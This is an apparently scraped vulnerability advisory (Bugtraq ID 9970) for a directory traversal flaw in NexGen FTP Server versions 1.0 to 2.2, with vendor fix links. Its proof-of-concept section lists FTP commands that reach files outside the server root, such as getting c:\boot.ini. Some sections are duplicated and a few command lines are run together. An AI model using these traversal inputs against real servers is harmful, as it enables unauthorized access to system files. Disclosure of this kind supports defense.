NexGen FTP Server Remote Directory Traversal Vulnerability
BID:9970
Info
NexGen FTP Server Remote Directory Traversal Vulnerability
| Bugtraq ID: | 9970 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 24 2004 12:00AM |
| Updated: | Mar 24 2004 12:00AM |
| Credit: | Disclosure of this issue is credited to Ziv Kamir. |
| Vulnerable: |
Nexgen FTP Server 2.2 Nexgen FTP Server 2.1 Nexgen FTP Server 2.0 Nexgen FTP Server 1.0 |
| Not Vulnerable: | |
Discussion
NexGen FTP Server Remote Directory Traversal Vulnerability
It has been reported that the Nexgen FTP server is prone to a remote directory traversal vulnerability. This issue is due to a failure of the application to properly sanitize file request strings from authenticated users.
Successful exploitation of this vulnerability may allow a remote attacker to gain access to sensitive information that may be used to launch further attacks against a vulnerable system.
It has been reported that the Nexgen FTP server is prone to a remote directory traversal vulnerability. This issue is due to a failure of the application to properly sanitize file request strings from authenticated users.
Successful exploitation of this vulnerability may allow a remote attacker to gain access to sensitive information that may be used to launch further attacks against a vulnerable system.
Exploit / POC
NexGen FTP Server Remote Directory Traversal Vulnerability
No exploit is required to leverage this issue. The following proof of concept has been provided:
ls c:\*.*
ls ..
ls \..ls /../
dir c:dir \..\*.*
get c:\"Exist File" [ c:\boot.ini ]
get \..\"Exist File"
No exploit is required to leverage this issue. The following proof of concept has been provided:
ls c:\*.*
ls ..
ls \..ls /../
dir c:dir \..\*.*
get c:\"Exist File" [ c:\boot.ini ]
get \..\"Exist File"
Solution / Fix
NexGen FTP Server Remote Directory Traversal Vulnerability
Solution:
The vendor has supplied an upgrade to the affected software that deals with this issue.
Nexgen FTP Server 1.0
Nexgen FTP Server 2.0
Nexgen FTP Server 2.1
Nexgen FTP Server 2.2
Solution:
The vendor has supplied an upgrade to the affected software that deals with this issue.
Nexgen FTP Server 1.0
-
NexGen NFTPS_Installer.exe
http://www.nexgenserver.com/downloads/NFTPS_Installer.exe
Nexgen FTP Server 2.0
-
NexGen NFTPS_Installer.exe
http://www.nexgenserver.com/downloads/NFTPS_Installer.exe
Nexgen FTP Server 2.1
-
NexGen NFTPS_Installer.exe
http://www.nexgenserver.com/downloads/NFTPS_Installer.exe
Nexgen FTP Server 2.2
-
NexGen NFTPS_Installer.exe
http://www.nexgenserver.com/downloads/NFTPS_Installer.exe
References
NexGen FTP Server Remote Directory Traversal Vulnerability
References:
References:
- FTP Server Home Page (Nexgen)
- Nexgen Server 2.2 Update Available (NexGen)